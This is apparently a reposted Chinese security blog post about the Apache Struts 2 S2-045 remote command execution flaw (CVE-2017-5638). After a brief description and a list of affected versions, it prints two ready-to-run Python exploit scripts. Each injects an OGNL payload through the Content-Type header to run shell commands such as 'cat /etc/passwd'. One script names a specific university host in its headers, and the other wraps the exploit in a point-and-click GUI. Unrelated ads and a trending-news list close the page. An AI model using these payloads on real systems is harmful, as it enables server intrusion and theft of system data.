Strurs2又现高危漏洞(附Poc&Exp)[一叶知安]
漏洞说明:
Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。漏洞编号:
CVE-2017-5638漏洞名称:
基于 Jakarta plugin插件的Struts远程代码执行漏洞官方评级:
高危漏洞描述:
恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。漏洞利用条件和方式:
黑客通过Jakarta 文件上传插件实现远程利用该漏洞执行代码。 1.基于Jakarta(Jakarta Multipart parser)插件的文件上传功能 2.恶意攻击者精心构造Content-Type的值漏洞影响范围:
Poc:
- Struts 2.3.5 – Struts 2.3.31
- Struts 2.5 – Struts 2.5.10
- Created by Lukasz Lenart, last modified yesterday at 01:14 PM
Exp:#! /usr/bin/env python # encoding:utf-8 import urllib2 import sys from poster.encode import multipart_encode from poster.streaminghttp import register_openers header1 ={ "Host":"alumnus.shu.edu.cn", "Connection":"keep-alive", "Refer":"alumnus.shu.edu.cn", "Accept":"*/*", "X-Requested-With":"XMLHttpRequest", "Accept-Encoding":"deflate", "Accept-Language":"zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4", } def poc(): register_openers() datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")}) header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" header["Content-Type"]='''%{(#nike='multipart/form-data'). (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#_memberAccess?(#_memberAccess=#dm): ((#container=#context['com.opensymphony.xwork2.ActionContext.container']). (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). (#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()). (#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd'). (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))). (#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)). (#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse(). getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)). (#ros.flush())}''' request = urllib2.Request(str(sys.argv[1]),datagen,headers=header) response = urllib2.urlopen(request) print response.read() poc()
来源微信号【 网络小捕快】#coding:utf-8 import urllib2 from Tkinter import * import sys from poster.encode import multipart_encode from poster.streaminghttp import register_openers class START(): def __init__(self,root): self.root=root self.show_W_Text = Text() self.show_url_ed = Label(root, text="str2") self.edit_url = Entry(root, text="输入地址") self.butt_whois = Button(root, text="kill",command=self.poc) self.show_url_ed.pack() self.edit_url.pack() self.butt_whois.pack() self.show_W_Text.pack() def poc(self): w_url = self.edit_url.get() text = self.show_W_Text register_openers() datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")}) header[ "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" header[ "Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" request = urllib2.Request(w_url, datagen, headers=header) response = urllib2.urlopen(request).read() text.insert(1.0, response) if __name__ == '__main__': root=Tk() root.title("str2 045") motion=START(root) mainloop()
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 澳门是伟大祖国的一方宝地 7989080
- 2 女子穿板鞋爬山回家脱鞋时被吓一跳 7905101
- 3 张雨绮 为了讨大家喜欢才穿成这样 7889940
- 4 2024 向上的中国 7705119
- 5 72岁老人3年拍100部短剧 7654720
- 6 免费升级宽带后家里成“电诈中心” 7581085
- 7 90%烧伤男生父亲:对方让我高抬贵手 7457248
- 8 9岁女孩胃里取出直径4厘米头发团 7342854
- 9 春熙路不能随便开直播了 7218218
- 10 男子网贷1000元3天内需还2000元 7179002